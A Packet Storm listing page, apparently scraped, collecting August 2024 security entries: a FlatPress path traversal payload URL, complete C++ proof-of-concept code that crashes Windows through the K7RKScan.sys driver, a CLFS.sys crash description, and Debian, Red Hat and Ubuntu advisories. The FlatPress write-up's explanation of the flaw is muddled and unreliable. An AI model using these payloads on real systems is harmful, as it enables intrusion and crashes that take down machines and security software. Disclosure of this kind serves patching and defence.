FlatPress version 1.3.1 suffers from a path traversal vulnerability.

    =============================================================================================================================================| # Title     : FlatPress 1.3.1 Path Validation Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://github.com/flatpressblog/flatpress/archive/1.3.1.zip                                                                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected item : /flatpress-1.3.1/fp-includes/core/core.config.php    if ($fullpath[0] != '/')    trigger_error('config_read: syntax error. Path must begin with a /');  [+] This line checks if the path starts with /. If it doesn’t, it triggers an error using trigger_error.     While this is valid, it might be better to use an InvalidArgumentException for more robust error handling.[+] use payload : /fp-includes/core/core.config.php/path=../../../../../fp-content/users/[+] http://127.0.0.1/flatpress-1.3.1/fp-includes/core/core.config.php/path=../../../../../fp-content/users/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

FlatPress 1.3.1 Path Traversal

The openscap project is a set of open source libraries that support the SCAP (Security Content Automation Protocol) set of standards from NIST. It supports CPE, CCE, CVE, CVSS, OVAL, and XCCDF.

OpenSCAP Libraries 1.4.0

In K7 Ultimate Security versions prior to 17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of a null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group.

    # Title:  K7 Ultimate Security < v17.0.2019 "K7RKScan.sys" Null Pointer Dereference  # Date: 13.08.2024# Author: M. Akil Gündoğan # Vendor Homepage: https://k7computing.com/# Version: < v17.0.2019# Tested on: Windows 10 Pro x64# CVE ID: CVE-2024-36424# Vulnerability Description:--------------------------------------In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group.# Technical details and step by step Proof of Concept's (PoC):--------------------------------------1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create.2 - Compile the attached PoC code written in C++ as release on VS 2022. 3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD.# Impact:--------------------------------------An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system.# Advisories:--------------------------------------K7 Computing recommends that all customers update their products to the corresponding versions shown below:K7 Ultimate Security (17.0.2019 or Higher)# Timeline:--------------------------------------- 16.05.2024 - Vulnerability reported.- 05.08.2024 - Vendor has fixed the vulnerability.- 13.08.2024 - Released.# References:--------------------------------------- Vendor: https://www.k7computing.com- Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424- Repository: https://github.com/secunnix/CVE-2024-36424# PoC Code (C++):-------------------------------------------------------------------------------------------------------------------------/*# Usage: Only compile it and run, boooom :)*/#include <windows.h>#include <iostream>const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link pathconst DWORD ioCTL = 0x222010;  // IOCTL 0x222010 or 0x222014int main() {    std::cout << "K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl;    HANDLE hDevice = CreateFile(driverDevice.c_str(),        GENERIC_READ | GENERIC_WRITE,        0,        nullptr,        OPEN_EXISTING,        0,        nullptr);    if (hDevice == INVALID_HANDLE_VALUE) {        std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl;        return 1;    }    void* inputBuffer = nullptr; // Null input buffer    DWORD inputBufferSize = 0;    DWORD bytesReturned;    BOOL result = DeviceIoControl(hDevice,        ioCTL,        inputBuffer,        inputBufferSize,        nullptr,        0,        &bytesReturned,        nullptr);    if (!result) {        std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl;    }    CloseHandle(hDevice);    return 0;}

K7 Ultimate Security NULL Pointer Dereference

Debian Linux Security Advisory 5748-1 - Several vulnerabilities have been discovered in the FFmpeg multimedia framework, which could result in denial of service or potentially the execution of arbitrary code if malformed files/streams are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5748-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 14, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ffmpegCVE ID         : CVE-2024-7055 CVE-2024-7272Several vulnerabilities have been discovered in the FFmpeg multimediaframework, which could result in denial of service or potentially theexecution of arbitrary code if malformed files/streams are processed.For the stable distribution (bookworm), these problems have been fixed inversion 7:5.1.6-0+deb12u1.We recommend that you upgrade your ffmpeg packages.For the detailed security status of ffmpeg please refer toits security tracker page at:https://security-tracker.debian.org/tracker/ffmpegFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAma8jqUACgkQEMKTtsN8Tjbh/A//RtTyTph1BfyvmrPoF2knaWzlgQVvLE4mFBHBAdFQb13WHzQmFWlxZYY6vAzxeBvje+jdpFGkQQS3yoQ/3OwOX9GeWQF8WpVDzQijBg7D4DMn1NK0s84Wya2xL67VGaaBb32TXdIlbExfrQMjFYZo+CGxamVBe49CzkxfiRoBDbDTItqY3dSpfv3cTpJZYBq/hj7HPaOkdOb6xUkAOrDkDyEWdvsHiZy6tt+jpL4jtOD3UZffi9TmYgfbbzS+zhBY54kOeLa2eoLr7d3BiK9j3V0Ee5fmICnk6h4hnUwZnlGCHLQLcgN3YTJp7YfRJ6OvYgZBwIUlZmQjM6tMT5EljXMZERfRGtATQ2fJws3KHFL5ZK/Tp/vsAJxPKkHiaWxQkQw//AUdT77m7ER13758LrFVI2Bm3HqEhrWwUUHvFa5tvk380zoWz8NR7hIMjfAGJ6v024dBFAiLVrLOcwZP4K/NxtAr6lUysNQlaVSWknUO65HNBx64KWowNCEleMbiW7VHSAeoKl5cQAe/Vr6CN0rwbEH5TCJUPbzN1xb9lBftMQOR4z1igW3pPCGdW9yZDDNY/cFEtSNI0++qFsg1JIkEr+dcP4H2yxNaEmcrf+N/paP/mD0ltaMsfuHxJa94Wg4q4/RfPhqRiQbgG6LwUHu1W93m8ddv52Qmv9ElgsA==3v1M-----END PGP SIGNATURE-----

Debian Security Advisory 5748-1

Red Hat Security Advisory 2024-5365-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include double free and null pointer vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5365.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel-rt security update  
Advisory ID:        RHSA-2024:5365-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5365  
Issue date:         2024-08-14  
Revision:           03  
CVE Names:          CVE-2021-47383  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: wifi: ath9k: delay all of ath9k_wmi_event_tasklet() until init is complete (CVE-2024-26897)

* kernel: wifi: rtl8xxxu: add cancel_work_sync() for c2hcmd_work (CVE-2024-27052)

* kernel: wifi: ath10k: fix NULL pointer dereference in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() (CVE-2023-52651)

* kernel: wifi: cfg80211: check A-MSDU format more carefully (CVE-2024-35937)

* kernel: platform/x86: wmi: Fix opening of char device (CVE-2023-52864)

* kernel: net: CVE-2024-36971 kernel: UAF in network route management (CVE-2024-36971)

* kernel: net/mlx5: Add a timeout to acquire the command queue semaphore (CVE-2024-38556)

* kernel: stm class: Fix a double free in stm_register_device() (CVE-2024-38627)

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-9.2 ad hoc schedule build (JIRA:RHEL-52875)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47383

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265653  
https://bugzilla.redhat.com/show_bug.cgi?id=2275655  
https://bugzilla.redhat.com/show_bug.cgi?id=2275742  
https://bugzilla.redhat.com/show_bug.cgi?id=2278417  
https://bugzilla.redhat.com/show_bug.cgi?id=2278435  
https://bugzilla.redhat.com/show_bug.cgi?id=2278519  
https://bugzilla.redhat.com/show_bug.cgi?id=2278989  
https://bugzilla.redhat.com/show_bug.cgi?id=2281057  
https://bugzilla.redhat.com/show_bug.cgi?id=2281257  
https://bugzilla.redhat.com/show_bug.cgi?id=2281272  
https://bugzilla.redhat.com/show_bug.cgi?id=2281647  
https://bugzilla.redhat.com/show_bug.cgi?id=2281821  
https://bugzilla.redhat.com/show_bug.cgi?id=2282357  
https://bugzilla.redhat.com/show_bug.cgi?id=2282719  
https://bugzilla.redhat.com/show_bug.cgi?id=2282720  
https://bugzilla.redhat.com/show_bug.cgi?id=2284474  
https://bugzilla.redhat.com/show_bug.cgi?id=2284511  
https://bugzilla.redhat.com/show_bug.cgi?id=2292331  
https://bugzilla.redhat.com/show_bug.cgi?id=2293402  
https://bugzilla.redhat.com/show_bug.cgi?id=2293443  
https://bugzilla.redhat.com/show_bug.cgi?id=2293444  
https://bugzilla.redhat.com/show_bug.cgi?id=2293461  
https://bugzilla.redhat.com/show_bug.cgi?id=2293700

Red Hat Security Advisory 2024-5365-03

Red Hat Security Advisory 2024-5364-03 - An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include double free, memory leak, and null pointer vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5364.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security update  
Advisory ID:        RHSA-2024:5364-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5364  
Issue date:         2024-08-14  
Revision:           03  
CVE Names:          CVE-2021-47383  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: gfs2: Fix kernel NULL pointer dereference in gfs2_rgrp_dump (CVE-2023-52448)

* kernel: wifi: ath9k: delay all of ath9k_wmi_event_tasklet() until init is complete (CVE-2024-26897)

* kernel: net: ice: Fix potential NULL pointer dereference in ice_bridge_setlink() (CVE-2024-26855)

* kernel: wifi: rtl8xxxu: add cancel_work_sync() for c2hcmd_work (CVE-2024-27052)

* kernel: nfp: flower: handle acti_netdevs allocation failure (CVE-2024-27046)

* kernel: wifi: ath10k: fix NULL pointer dereference in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() (CVE-2023-52651)

* kernel: dmaengine/idxd: hardware erratum allows potential security problem with direct access by untrusted application (CVE-2024-21823)

* kernel: wifi: mac80211: check/clear fast rx for non-4addr sta VLAN changes (CVE-2024-35789)

* kernel: mlxsw: spectrum_acl_tcam: Fix memory leak when canceling rehash work (CVE-2024-35852)

* kernel: wifi: iwlwifi: dbg-tlv: ensure NUL termination (CVE-2024-35845)

* kernel: mlxbf_gige: call request_irq() after NAPI initialized (CVE-2024-35907)

* kernel: wifi: cfg80211: check A-MSDU format more carefully (CVE-2024-35937)

* kernel: tty: Fix out-of-bound vmalloc access in imageblit (CVE-2021-47383)

* kernel: platform/x86: wmi: Fix opening of char device (CVE-2023-52864)

* kernel: cxl/port: Fix delete_endpoint() vs parent unregistration race (CVE-2023-52771)

* kernel: wifi: nl80211: don't free NULL coalescing rule (CVE-2024-36941)

* kernel: wifi: iwlwifi: read txq->read_ptr under lock (CVE-2024-36922)

* kernel: net: CVE-2024-36971 kernel: UAF in network route management (CVE-2024-36971)

* kernel: r8169: Fix possible ring buffer corruption on fragmented Tx packets. (CVE-2024-38586)

* kernel: net/mlx5: Add a timeout to acquire the command queue semaphore (CVE-2024-38556)

* kernel: net/mlx5: Discard command completions in internal error (CVE-2024-38555)

* kernel: net: bridge: xmit: make sure we have at least eth header len bytes (CVE-2024-38538)

* kernel: stm class: Fix a double free in stm_register_device() (CVE-2024-38627)

Bug Fix(es):

* [REGRESSION] sk_memory_allocated counter leaking on aarch64 (JIRA:RHEL-36775)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47383

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265653  
https://bugzilla.redhat.com/show_bug.cgi?id=2275655  
https://bugzilla.redhat.com/show_bug.cgi?id=2275742  
https://bugzilla.redhat.com/show_bug.cgi?id=2278417  
https://bugzilla.redhat.com/show_bug.cgi?id=2278435  
https://bugzilla.redhat.com/show_bug.cgi?id=2278519  
https://bugzilla.redhat.com/show_bug.cgi?id=2278989  
https://bugzilla.redhat.com/show_bug.cgi?id=2281057  
https://bugzilla.redhat.com/show_bug.cgi?id=2281257  
https://bugzilla.redhat.com/show_bug.cgi?id=2281272  
https://bugzilla.redhat.com/show_bug.cgi?id=2281647  
https://bugzilla.redhat.com/show_bug.cgi?id=2281821  
https://bugzilla.redhat.com/show_bug.cgi?id=2282357  
https://bugzilla.redhat.com/show_bug.cgi?id=2282719  
https://bugzilla.redhat.com/show_bug.cgi?id=2282720  
https://bugzilla.redhat.com/show_bug.cgi?id=2284474  
https://bugzilla.redhat.com/show_bug.cgi?id=2284511  
https://bugzilla.redhat.com/show_bug.cgi?id=2292331  
https://bugzilla.redhat.com/show_bug.cgi?id=2293402  
https://bugzilla.redhat.com/show_bug.cgi?id=2293443  
https://bugzilla.redhat.com/show_bug.cgi?id=2293444  
https://bugzilla.redhat.com/show_bug.cgi?id=2293461  
https://bugzilla.redhat.com/show_bug.cgi?id=2293700

Red Hat Security Advisory 2024-5364-03

Red Hat Security Advisory 2024-5338-03 - An update for pcs is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5338.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: pcs security updateAdvisory ID:        RHSA-2024:5338-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5338Issue date:         2024-08-14Revision:           03CVE Names:          CVE-2024-35176====================================================================Summary: An update for pcs is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities.Security Fix(es):* REXML: DoS parsing an XML with many `<`s in an attribute value (CVE-2024-35176)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-35176References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=2280894

Red Hat Security Advisory 2024-5338-03

CVE-2024-6768 is a vulnerability in the Common Log File System (CLFS.sys) driver of Windows, caused by improper validation of specified quantities in input data. This flaw leads to an unrecoverable inconsistency, triggering the KeBugCheckEx function and resulting in a Blue Screen of Death (BSoD). The issue affects all versions of Windows 10 and Windows 11, Windows Server 2016, Server 2019 and Server 2022 despite having all updates applied. This Proof of Concept (PoC) shows that by crafting specific values within a .BLF file, an unprivileged user can induce a system crash.

Microsoft CLFS.sys Denial of Service

Ubuntu Security Notice 6959-1 - It was discovered that .NET suffered from an information disclosure vulnerability. An attacker could potentially use this issue to read targeted email messages.

==========================================================================  
Ubuntu Security Notice USN-6959-1  
August 13, 2024

dotnet8 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS

Summary:

dotnet8 could be made to disclose sensitive information.

Software Description:  
- dotnet8: .NET CLI tools and runtime

Details:

It was discovered that .NET suffered from an information disclosure  
vulnerability. An attacker could potentially use this issue to  
read targeted email messages.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   aspnetcore-runtime-8.0          8.0.8-0ubuntu1~24.04.1  
   dotnet-host-8.0                 8.0.8-0ubuntu1~24.04.1  
   dotnet-hostfxr-8.0              8.0.8-0ubuntu1~24.04.1  
   dotnet-runtime-8.0              8.0.8-0ubuntu1~24.04.1  
   dotnet-sdk-8.0                  8.0.108-0ubuntu1~24.04.1  
   dotnet8                         8.0.108-8.0.8-0ubuntu1~24.04.1

Ubuntu 22.04 LTS  
   aspnetcore-runtime-8.0          8.0.8-0ubuntu1~22.04.1  
   dotnet-host-8.0                 8.0.8-0ubuntu1~22.04.1  
   dotnet-hostfxr-8.0              8.0.8-0ubuntu1~22.04.1  
   dotnet-runtime-8.0              8.0.8-0ubuntu1~22.04.1  
   dotnet-sdk-8.0                  8.0.108-0ubuntu1~22.04.1  
   dotnet8                         8.0.108-8.0.8-0ubuntu1~22.04.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6959-1  
   CVE-2024-38167

Package Information:  
https://launchpad.net/ubuntu/+source/dotnet8/8.0.108-8.0.8-0ubuntu1~24.04.1  
https://launchpad.net/ubuntu/+source/dotnet8/8.0.108-8.0.8-0ubuntu1~22.04.1

Ubuntu Security Notice USN-6959-1

Red Hat Security Advisory 2024-5337-03 - An update for.NET 8.0 is now available for Red Hat Enterprise Linux 8. Issues addressed include an information leakage vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5337.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: .NET 8.0 security updateAdvisory ID:        RHSA-2024:5337-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5337Issue date:         2024-08-14Revision:           03CVE Names:          CVE-2024-38167====================================================================Summary: An update for .NET 8.0 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.108 and .NET Runtime 8.0.8.Security Fix(es):* dotnet: Information disclosure vulnerability in TlsStream (CVE-2024-38167)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Security Fix(es):* EMBARGOED CVE-2024-38167 dotnet8.0: Information disclosure vulnerability in TlsStream (CVE-2024-38167)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38167References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2302428https://issues.redhat.com/browse/RHEL-47081

Source

Packet Storm